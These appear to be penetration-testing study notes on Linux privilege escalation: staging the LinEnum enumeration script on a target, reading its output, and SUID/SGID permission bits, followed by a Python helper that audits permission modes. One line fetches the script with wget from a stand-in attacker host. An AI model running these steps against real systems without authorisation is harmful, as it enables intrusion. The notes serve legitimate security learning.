Direction of Privilege Escalation

- Horizontal Privesc: Taking over a different user who is at the same privilege level as us (travelling sideways on the tree).
- Vertical Privesc: Attempting to gain higher privileges or access from an account we have already compromised.
Enumeration
LinEnum
Getting LinEnum on the target machine
- Method 1:
- Go to the directory in which LinEnum is stored and start a Python web server with:
python3 -m http.server 8000
- Use wget on the target machine to grab the file:
wget Attacker_IP:8000/LinEnum.sh
- Then make the file executable using:
chmod +x LinEnum.sh
- Method 2:
- If we are unable to transfer the file as described in the method above, and we have sufficient permissions, we can copy the raw LinEnum code from our local machine.
- Paste it into any text editor on the target machine and save it as LinEnum.sh.
- Then make the file executable using the command
chmod +x LinEnum.sh
Understanding LinEnum Output
- Output is broken down into different sections. The main sections are:
- Kernel: Kernel information is shown here. This is where to check the reported version for a known kernel exploit that may apply to this machine.
- Can we read/write sensitive files: Files that any authenticated user can read and write to are listed here. By looking at the permissions we can spot misconfigurations that let users who should not be able to write to sensitive files do so.
- SUID Files: The SUID files found are listed. SUID (Set owner User ID) is a special file permission that lets a file run with the permissions of its owner rather than those of the user who executes it.
- Crontab Contents: Scheduled cron jobs are shown.
Abusing SUID/SGID Files
Finding and Exploiting SUID files
- The maximum permission value for each class (owner, group, other) is 7: read (4) + write (2) + execute (1).
- Example: rwxr-xr-x denotes the permission 755.
- When a special permission bit is added in front of these three digits, the file becomes SUID or SGID.
- When the extra bit 4 is set for the user (owner), it becomes SUID.
- When the extra bit 2 is set for the group, it becomes SGID (Set Group ID).
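The permission arithmetic above, and the "can we read/write sensitive files" check from the LinEnum output section, as an added worked example (not LinEnum's own code, and not part of the original notes). It converts the symbolic mode string that ls -l prints (rwsr-xr-x) into the numeric form (4755) and back, then audits a few constructed ls -l lines and flags SUID, SGID and world-writable entries. The sample lines, paths and the audit_ls_output helper are assumptions made for the example; the sticky bit is handled too, which goes slightly beyond the text.

```python
"""Permission-bit helper (added example, not from LinEnum or the original notes).

Converts between the 9-character symbolic mode shown by `ls -l` and the
numeric mode, then audits constructed `ls -l` lines for the entries an
enumeration pass cares about: SUID, SGID and world-writable files.
"""
import stat
from typing import Dict, List

# (read, write, execute, special bit, special char) for owner, group, other.
# An 's'/'t' in the execute slot means the special bit AND execute are set;
# an uppercase 'S'/'T' means the special bit is set without execute.
_TRIPLETS = [
    (stat.S_IRUSR, stat.S_IWUSR, stat.S_IXUSR, stat.S_ISUID, "s"),  # owner: 4000
    (stat.S_IRGRP, stat.S_IWGRP, stat.S_IXGRP, stat.S_ISGID, "s"),  # group: 2000
    (stat.S_IROTH, stat.S_IWOTH, stat.S_IXOTH, stat.S_ISVTX, "t"),  # other: 1000 (sticky)
]


def symbolic_to_mode(sym: str) -> int:
    """'rwsr-xr-x' -> 0o4755. Raises ValueError on malformed input."""
    if len(sym) != 9:
        raise ValueError(f"expected 9 permission characters, got {sym!r}")
    mode = 0
    for i, (r, w, x, special, special_char) in enumerate(_TRIPLETS):
        rc, wc, xc = sym[3 * i: 3 * i + 3]
        if rc == "r":
            mode |= r
        elif rc != "-":
            raise ValueError(f"bad read flag {rc!r} in {sym!r}")
        if wc == "w":
            mode |= w
        elif wc != "-":
            raise ValueError(f"bad write flag {wc!r} in {sym!r}")
        if xc == "x":
            mode |= x
        elif xc == special_char:          # 's' or 't': special bit + execute
            mode |= special | x
        elif xc == special_char.upper():  # 'S' or 'T': special bit, no execute
            mode |= special
        elif xc != "-":
            raise ValueError(f"bad execute flag {xc!r} in {sym!r}")
    return mode


def mode_to_symbolic(mode: int) -> str:
    """0o4755 -> 'rwsr-xr-x' (inverse of symbolic_to_mode)."""
    out = []
    for r, w, x, special, special_char in _TRIPLETS:
        out.append("r" if mode & r else "-")
        out.append("w" if mode & w else "-")
        if mode & special:
            out.append(special_char if mode & x else special_char.upper())
        else:
            out.append("x" if mode & x else "-")
    return "".join(out)


def octal_string(mode: int) -> str:
    """0o4755 -> '4755': the four-digit form used in the notes (special bit first)."""
    return f"{mode & 0o7777:04o}"


def audit_ls_output(text: str) -> List[Dict]:
    """Flag SUID, SGID and world-writable entries in `ls -l` style lines.

    Assumes the path is the last whitespace-separated field (paths containing
    spaces would need a real parser). Lines without a 10-char mode are skipped.
    """
    findings = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 2 or len(fields[0]) != 10:
            continue
        mode = symbolic_to_mode(fields[0][1:])  # drop the file-type character
        flags = []
        if mode & stat.S_ISUID:
            flags.append("SUID")
        if mode & stat.S_ISGID:
            flags.append("SGID")
        if mode & stat.S_IWOTH:
            flags.append("world-writable")
        if flags:
            findings.append({"path": fields[-1], "octal": octal_string(mode), "flags": flags})
    return findings


# Constructed sample `ls -l` output for the example; sizes and paths are made up.
SAMPLE_LS = """\
-rwsr-xr-x 1 root root   59976 Jan  1 00:00 /usr/bin/passwd
-rwxr-sr-x 1 root shadow 31032 Jan  1 00:00 /usr/bin/chage
-rw-rw-rw- 1 root root    1234 Jan  1 00:00 /etc/example-app.conf
-rwxr-xr-x 1 root root    5678 Jan  1 00:00 /usr/bin/example-clean
-rwsr-sr-x 1 root root    9999 Jan  1 00:00 /opt/example/tool
"""

if __name__ == "__main__":
    print(octal_string(symbolic_to_mode("rwxr-xr-x")))  # 0755
    print(octal_string(symbolic_to_mode("rwsr-xr-x")))  # 4755
    for finding in audit_ls_output(SAMPLE_LS):
        print(finding)
```

On a real box the same audit_ls_output function can be fed the output of ls -l for the files LinEnum reports; the point of the example is that the leading 4 or 2 of 4755 or 2755 is just the SUID or SGID bit sitting in front of the ordinary rwx digits, and that a lowercase s in the execute slot is what reveals it in ls -l listings.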